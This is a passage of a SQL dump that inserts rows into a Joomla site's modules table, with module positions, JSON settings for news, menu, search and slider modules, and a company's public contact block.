INSERT INTO `atlyh_modules` VALUES (2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(17,185,'Breadcrumbs','','',1,'breadcrumb',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,1,'{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(35,186,'Search','','',1,'offcanvas',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(79,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(94,187,'Contact Us','','<p class=\"contactustext\">T: 031 564 3210 <br />E: info@dashlogic.co.za <br />C: 086 123 4567<br /><br />Office hours <br />(Mon - Fri) 08:00AM - 18:00PM<br /><br />Find us on Google Maps</p>',1,'bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"whitetext\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(95,188,'Latest News','','',1,'bottom2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_articles_latest',1,1,'{\"catid\":[\"79\"],\"count\":\"4\",\"show_featured\":\"\",\"ordering\":\"random\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(96,189,'Our Partners','','',1,'bottom3',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"partners\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(97,190,'Saleslogic Products','','',1,'bottom1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"saleslogic\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(99,203,'Latest News','','',2,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_articles_latest',1,1,'{\"catid\":[\"79\"],\"count\":\"6\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(100,204,'Search','','',1,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(101,205,'Information','','',3,'right',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"partners\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(102,206,'Search','','',1,'left',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"0\",\"button_pos\":\"right\",\"imagebutton\":\"0\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(103,207,'Latest News','','',2,'left',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_articles_latest',1,1,'{\"catid\":[\"79\"],\"count\":\"6\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(104,208,'Information','','',3,'left',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"partners\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(105,209,'Off Canvas Menu','','',1,'offcanvas',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,0,'{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"icon\":\"\",\"background_color\":\"\",\"color\":\"\",\"padding\":\"\",\"margin\":\"\"}',0,'*'),(110,219,'JSitemap module','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_jmap',1,1,'',0,'*'),(111,220,'JSitemap Quickicons','','',99,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_jmapquickicon',1,1,'',1,'*'),(112,222,'News Show Pro GK5','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_news_pro_gk5',1,1,'{\"moduleclass_sfx\":\"\",\"module_unique_id\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_mode\":\"normal\",\"use_own_article_format\":\"0\",\"article_format\":\"\",\"article_format_text\":\"\",\"data_source\":\"com_content_categories\",\"source_name\":\"com_content\",\"com_content_categories\":[\"79\"],\"com_content_articles\":\"\",\"k2_articles\":\"\",\"easyblog_articles\":\"\",\"rss_feed\":\"\",\"json_file\":\"\",\"xml_file\":\"\",\"com_virtuemart_products\":\"\",\"com_hikashop_products\":\"\",\"jomsocial_user_status\":\"\",\"jomsocial_user_photo\":\"\",\"news_sort_value\":\"hits\",\"news_sort_order\":\"ASC\",\"offset\":\"0\",\"news_since\":\"\",\"news_in\":\"\",\"news_featured\":\"1\",\"only_featured\":\"0\",\"one_article_per_category\":\"0\",\"news_unauthorized\":\"0\",\"time_offset\":\"0\",\"thumb_image_type\":\"first\",\"com_content_comments_source\":\"none\",\"com_content_text_type\":\"introtext\",\"hide_current_com_content_article\":\"1\",\"k2_comments_source\":\"k2\",\"com_k2_text_type\":\"introtext\",\"hide_current_k2_article\":\"0\",\"k2_image_size\":\"Generic\",\"k2_get_extra_fields\":\"0\",\"hikashop_itemid\":\"9999\",\"hikashop_out_of_stock\":\"1\",\"hikashop_add_to_cart\":\"1\",\"rss_cache_time\":\"60\",\"easyblog_comments_source\":\"easyblog\",\"hide_current_easyblog_article\":\"0\",\"easyblog_image_size\":\"original\",\"vm_itemid\":\"9999\",\"vm_lang\":\"\",\"vm_out_of_stock\":\"1\",\"vm_show_price_type\":\"salesPrice\",\"vm_add_to_cart\":\"0\",\"vm_show_discount_amount\":\"0\",\"vm_show_tax\":\"0\",\"vm_display_type\":\"text_price\",\"vm_show_featured_badge\":\"0\",\"portal_mode_news_gallery_amount\":\"10\",\"portal_mode_news_gallery_cols\":\"3\",\"portal_mode_news_gallery_pagination_type\":\"arrows\",\"portal_mode_news_gallery_autoanimation\":\"1\",\"portal_mode_news_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_amount\":\"10\",\"portal_mode_product_gallery_cols\":\"3\",\"portal_mode_product_gallery_nav\":\"1\",\"portal_mode_product_gallery_autoanimation\":\"1\",\"portal_mode_product_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_2_rows\":\"2\",\"portal_mode_product_gallery_2_cols\":\"4\",\"portal_mode_product_gallery_2_button\":\"cart\",\"portal_mode_news_blocks_cols\":\"2\",\"portal_mode_news_blocks_rows\":\"2\",\"portal_mode_title_overlay_text_pos\":\"top\",\"portal_mode_title_overlay_text_padding\":\"30px\",\"portal_mode_title_overlay_text_bg\":\"transparent\",\"portal_mode_title_overlay_text_width\":\"100\",\"portal_mode_centered_title_overlay_text_bg\":\"\",\"portal_mode_centered_title_limit_type\":\"chars\",\"portal_mode_centered_title_limit\":\"40\",\"portal_mode_centered_text_limit_type\":\"words\",\"portal_mode_centered_text_limit\":\"30\",\"portal_mode_portfolio_initial_anim\":\"0\",\"portal_mode_portfolio_cols\":\"3\",\"portal_mode_portfolio_rows\":\"3\",\"portal_mode_portfolio_pages\":\"3\",\"portal_mode_portfolio_link\":\"1\",\"portal_mode_portfolio_link_url\":\"\",\"portal_mode_portfolio2_cols\":\"3\",\"portal_mode_portfolio2_rows\":\"3\",\"portal_mode_portfolio2_filter\":\"1\",\"portal_mode_portfolio2_popup\":\"1\",\"portal_mode_speakers_list_cols\":\"2\",\"portal_mode_speakers_list_rows\":\"2\",\"portal_mode_grid_title_overlay_text_pos\":\"none\",\"portal_mode_grid_title_overlay_text_color\":\"light\",\"portal_mode_grid_title_overlay_text_padding\":\"30px\",\"portal_mode_frontpage_image_overlay_text_color\":\"light\",\"portal_mode_frontpage_image_overlay_title\":\"1\",\"portal_mode_frontpage_image_overlay_text\":\"1\",\"portal_mode_frontpage_image_overlay_text_limit\":\"100\",\"portal_mode_frontpage_image_overlay_readon\":\"1\",\"portal_mode_frontpage_image_overlay_readon_text\":\"\",\"portal_mode_highlights_readmore\":\"\",\"portal_mode_highlights_amount\":\"7\",\"portal_mode_highlights_date_format\":\"\",\"portal_mode_highlights_title_limit_type\":\"chars\",\"portal_mode_highlights_title_limit\":\"40\",\"portal_mode_video_gallery_popup\":\"1\",\"portal_mode_video_gallery_popup_x\":\"640\",\"portal_mode_video_gallery_popup_y\":\"480\",\"portal_mode_video_gallery_pages\":\"2\",\"portal_mode_video_gallery_per_page\":\"3\",\"portal_mode_video_gallery_title_limit_type\":\"chars\",\"portal_mode_video_gallery_title_limit\":\"40\",\"portal_mode_video_gallery_text_limit_type\":\"chars\",\"portal_mode_video_gallery_text_limit\":\"60\",\"portal_mode_video_gallery_autoanimation\":\"5000\",\"portal_mode_video_list_popup\":\"1\",\"portal_mode_video_list_popup_x\":\"640\",\"portal_mode_video_list_popup_y\":\"480\",\"portal_mode_video_list_pages\":\"2\",\"portal_mode_video_list_per_page\":\"3\",\"portal_mode_video_list_title\":\"1\",\"portal_mode_video_list_date\":\"1\",\"portal_mode_video_list_title_limit_type\":\"chars\",\"portal_mode_video_list_title_limit\":\"40\",\"portal_mode_events_list_cols\":\"2\",\"portal_mode_events_list_rows\":\"2\",\"portal_mode_jomsocial_photos_total\":\"8\",\"portal_mode_jomsocial_photos_amount\":\"4\",\"portal_mode_jomsocial_photos_width\":\"310\",\"portal_mode_jomsocial_photos_animation\":\"0\",\"portal_mode_grid_news_cols\":\"2\",\"portal_mode_grid_news_rows\":\"2\",\"portal_mode_grid_news_title_length\":\"40\",\"portal_mode_grid_news_title_length_type\":\"chars\",\"portal_mode_grid_news_date_format\":\"f J, Y\",\"portal_mode_grid_news_text_length\":\"40\",\"portal_mode_grid_news_text_length_type\":\"chars\",\"portal_mode_grid_news_url\":\"\",\"portal_mode_grid_news_link_text\":\"Find more news\",\"portal_mode_portfolio_grid_amount\":\"20\",\"portal_mode_portfolio_grid_cols\":\"5\",\"portal_mode_portfolio_grid_cols_small_desktop\":\"4\",\"portal_mode_portfolio_grid_cols_tablet\":\"3\",\"portal_mode_portfolio_grid_cols_small_tablet\":\"2\",\"portal_mode_portfolio_grid_cols_mobile\":\"1\",\"portal_mode_portfolio_grid_title_length\":\"40\",\"portal_mode_portfolio_grid_title_length_type\":\"chars\",\"portal_mode_portfolio_grid_title_link\":\"1\",\"portal_mode_portfolio_grid_overlay\":\"1\",\"portal_mode_portfolio_grid_popup\":\"1\",\"portal_mode_portfolio_grid_date_format\":\"f J, Y\",\"portal_mode_portfolio_grid_author\":\"1\",\"portal_mode_news_slider_amount\":\"5\",\"portal_mode_news_slider_title\":\"1\",\"portal_mode_news_slider_text\":\"1\",\"portal_mode_news_slider_date\":\"1\",\"portal_mode_news_slider_date_format\":\"j F\",\"portal_mode_news_slider_autoanimation_time\":\"3000\",\"portal_mode_news_slider_image_margin\":\"-30% 0\",\"portal_mode_news_slider_label\":\"\",\"portal_mode_news_slider_category_label\":\"\",\"portal_mode_bikestore_slider_amount\":\"8\",\"portal_mode_bikestore_slider_speed\":\"3500\",\"portal_mode_bikestore_slider_autoanim\":\"0\",\"news_full_pages\":\"3\",\"news_column\":\"3\",\"news_rows\":\"1\",\"top_interface_style\":\"arrows\",\"open_links_window\":\"_self\",\"news_content_header_pos\":\"left\",\"news_content_header_float\":\"none\",\"news_header_link\":\"0\",\"news_header_first_word\":\"0\",\"use_title_alias\":\"0\",\"title_limit_type\":\"chars\",\"title_limit\":\"40\",\"news_content_image_pos\":\"left\",\"news_content_image_float\":\"left\",\"news_image_link\":\"1\",\"news_image_modal\":\"0\",\"news_content_text_pos\":\"left\",\"news_content_text_float\":\"left\",\"news_text_link\":\"0\",\"news_limit_type\":\"chars\",\"news_limit\":\"220\",\"clean_xhtml\":\"1\",\"allowed_tags\":\"\",\"more_text_value\":\"...\",\"readmore_text\":\"\",\"parse_plugins\":\"0\",\"clean_plugins\":\"0\",\"news_content_info_pos\":\"left\",\"news_content_info_float\":\"none\",\"news_content_info2_pos\":\"left\",\"news_content_info2_float\":\"left\",\"info_format\":\"%DATE %HITS %CATEGORY %AUTHOR\",\"info2_format\":\"\",\"category_link\":\"0\",\"date_format\":\"d-m-Y\",\"date_publish\":\"0\",\"username\":\"users.name\",\"user_avatar\":\"0\",\"avatar_size\":\"16\",\"art_padding\":\"0 40px\",\"news_header_order\":\"2\",\"news_header_enabled\":\"1\",\"news_image_order\":\"1\",\"news_image_enabled\":\"1\",\"news_text_order\":\"3\",\"news_text_enabled\":\"1\",\"news_info_order\":\"4\",\"news_info_enabled\":\"0\",\"news_info2_order\":\"5\",\"news_info2_enabled\":\"0\",\"news_content_readmore_pos\":\"left\",\"news_readmore_enabled\":\"1\",\"news_short_pages\":\"3\",\"links_amount\":\"3\",\"links_columns_amount\":\"1\",\"links_image\":\"0\",\"links_readmore\":\"0\",\"bottom_interface_style\":\"arrows_with_pagination\",\"links_margin\":\"0\",\"links_position\":\"bottom\",\"links_width\":\"50\",\"list_title_limit_type\":\"words\",\"list_title_limit\":\"20\",\"list_text_limit_type\":\"words\",\"list_text_limit\":\"30\",\"links_title\":\"0\",\"links_title_url\":\"\",\"links_title_label\":\"\",\"responsive_images\":\"1\",\"wrap_content\":\"0\",\"memory_limit\":\"128M\",\"use_curl_download\":\"0\",\"create_thumbs\":\"1\",\"img_auto_scale\":\"1\",\"img_keep_aspect_ratio\":\"0\",\"img_width\":\"350\",\"img_height\":\"243\",\"img_margin\":\"0 0 20px 0\",\"links_img_width\":\"160\",\"links_img_height\":\"120\",\"links_img_margin\":\"6px 14px 0 0\",\"img_bg\":\"#000000\",\"img_stretch\":\"0\",\"img_quality\":\"95\",\"thumbs_cache_time\":\"0\",\"simple_crop_top\":\"0\",\"simple_crop_bottom\":\"0\",\"simple_crop_left\":\"0\",\"simple_crop_right\":\"0\",\"crop_rules\":\"\",\"grayscale_filter\":\"0\",\"sepia_filter\":\"0\",\"blur_filter\":\"0\",\"brightness_filter\":\"0\",\"smooth_filter\":\"0\",\"pixelate_filter\":\"0\",\"contrast_filter\":\"0\",\"filter_arg\":\"0\",\"autoanim\":\"0\",\"hover_anim\":\"0\",\"animation_speed\":\"400\",\"animation_interval\":\"5000\",\"animation_function\":\"Fx.Transitions.Expo.easeIn\",\"useCSS\":\"1\",\"useScript\":\"2\",\"engine_mode\":\"jquery\",\"include_jquery\":\"0\",\"url_overrides\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(113,224,'DJ-ImageSlider','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_djimageslider',1,0,'{\"slider_source\":\"1\",\"slider_type\":\"2\",\"theme\":\"default\",\"link_image\":\"1\",\"image_folder\":\"images\\/sampledata\\/fruitshop\",\"link\":\"\",\"category\":\"85\",\"show_title\":\"0\",\"show_desc\":\"0\",\"show_readmore\":\"0\",\"readmore_text\":\"\",\"link_title\":\"0\",\"link_desc\":\"0\",\"limit_desc\":\"\",\"full_width\":\"1\",\"image_width\":\"1920\",\"image_height\":\"691\",\"fit_to\":\"1\",\"image_centering\":\"0\",\"visible_images\":\"1\",\"space_between_images\":\"10\",\"max_images\":\"20\",\"sort_by\":\"1\",\"css3\":\"1\",\"autoplay\":\"1\",\"show_buttons\":\"0\",\"show_arrows\":\"1\",\"show_custom_nav\":\"1\",\"desc_width\":\"\",\"desc_bottom\":\"0\",\"desc_horizontal\":\"0\",\"left_arrow\":\"\",\"right_arrow\":\"\",\"play_button\":\"\",\"pause_button\":\"\",\"arrows_top\":\"80\",\"arrows_horizontal\":\"10\",\"idx_style\":\"0\",\"effect\":\"Linear\",\"effect_type\":\"0\",\"duration\":\"2000\",\"delay\":\"10000\",\"preload\":\"800\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(116,230,'SP Page Builder','','',0,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sppagebuilder_icons',1,1,'',1,'*'),(117,231,'SP Page Builder Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_sppagebuilder_admin_menu',1,1,'',1,'*'),(118,232,'Top Buttons','','<div class=\"topbuttons\"><a href=\"#\"><img src=\"images/top-support.png\" alt=\"\" /></a></div>\r\n<div class=\"topbuttons\"><img src=\"images/top-login.png\" alt=\"\" /></div>\r\n<div class=\"topbuttons\"><img src=\"images/top-contact.png\" alt=\"\" /></div>',1,'top2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(119,242,'Saleslogic Products','','',1,'position1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_news_pro_gk5',1,0,'{\"moduleclass_sfx\":\"\",\"module_unique_id\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_mode\":\"normal\",\"use_own_article_format\":\"0\",\"article_format\":\"\",\"article_format_text\":\"\",\"data_source\":\"com_content_categories\",\"source_name\":\"com_content\",\"com_content_categories\":[\"86\"],\"com_content_articles\":\"\",\"k2_articles\":\"\",\"easyblog_articles\":\"\",\"rss_feed\":\"\",\"json_file\":\"\",\"xml_file\":\"\",\"com_virtuemart_products\":\"\",\"com_hikashop_products\":\"\",\"jomsocial_user_status\":\"\",\"jomsocial_user_photo\":\"\",\"news_sort_value\":\"title\",\"news_sort_order\":\"ASC\",\"offset\":\"0\",\"news_since\":\"\",\"news_in\":\"\",\"news_featured\":\"0\",\"only_featured\":\"0\",\"one_article_per_category\":\"0\",\"news_unauthorized\":\"0\",\"time_offset\":\"0\",\"thumb_image_type\":\"full\",\"com_content_comments_source\":\"none\",\"com_content_text_type\":\"introtext\",\"hide_current_com_content_article\":\"0\",\"k2_comments_source\":\"k2\",\"com_k2_text_type\":\"introtext\",\"hide_current_k2_article\":\"0\",\"k2_image_size\":\"Generic\",\"k2_get_extra_fields\":\"0\",\"hikashop_itemid\":\"9999\",\"hikashop_out_of_stock\":\"1\",\"hikashop_add_to_cart\":\"1\",\"rss_cache_time\":\"60\",\"easyblog_comments_source\":\"easyblog\",\"hide_current_easyblog_article\":\"0\",\"easyblog_image_size\":\"original\",\"vm_itemid\":\"9999\",\"vm_lang\":\"\",\"vm_out_of_stock\":\"1\",\"vm_show_price_type\":\"salesPrice\",\"vm_add_to_cart\":\"0\",\"vm_show_discount_amount\":\"0\",\"vm_show_tax\":\"0\",\"vm_display_type\":\"text_price\",\"vm_show_featured_badge\":\"0\",\"portal_mode_news_gallery_amount\":\"10\",\"portal_mode_news_gallery_cols\":\"3\",\"portal_mode_news_gallery_pagination_type\":\"arrows\",\"portal_mode_news_gallery_autoanimation\":\"1\",\"portal_mode_news_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_amount\":\"10\",\"portal_mode_product_gallery_cols\":\"3\",\"portal_mode_product_gallery_nav\":\"1\",\"portal_mode_product_gallery_autoanimation\":\"1\",\"portal_mode_product_gallery_autoanimation_time\":\"5000\",\"portal_mode_product_gallery_2_rows\":\"2\",\"portal_mode_product_gallery_2_cols\":\"4\",\"portal_mode_product_gallery_2_button\":\"cart\",\"portal_mode_news_blocks_cols\":\"2\",\"portal_mode_news_blocks_rows\":\"2\",\"portal_mode_title_overlay_text_pos\":\"top\",\"portal_mode_title_overlay_text_padding\":\"30px\",\"portal_mode_title_overlay_text_bg\":\"transparent\",\"portal_mode_title_overlay_text_width\":\"100\",\"portal_mode_centered_title_overlay_text_bg\":\"\",\"portal_mode_centered_title_limit_type\":\"chars\",\"portal_mode_centered_title_limit\":\"40\",\"portal_mode_centered_text_limit_type\":\"words\",\"portal_mode_centered_text_limit\":\"30\",\"portal_mode_portfolio_initial_anim\":\"0\",\"portal_mode_portfolio_cols\":\"3\",\"portal_mode_portfolio_rows\":\"3\",\"portal_mode_portfolio_pages\":\"3\",\"portal_mode_portfolio_link\":\"1\",\"portal_mode_portfolio_link_url\":\"\",\"portal_mode_portfolio2_cols\":\"3\",\"portal_mode_portfolio2_rows\":\"3\",\"portal_mode_portfolio2_filter\":\"1\",\"portal_mode_portfolio2_popup\":\"1\",\"portal_mode_speakers_list_cols\":\"2\",\"portal_mode_speakers_list_rows\":\"2\",\"portal_mode_grid_title_overlay_text_pos\":\"none\",\"portal_mode_grid_title_overlay_text_color\":\"light\",\"portal_mode_grid_title_overlay_text_padding\":\"30px\",\"portal_mode_frontpage_image_overlay_text_color\":\"light\",\"portal_mode_frontpage_image_overlay_title\":\"1\",\"portal_mode_frontpage_image_overlay_text\":\"1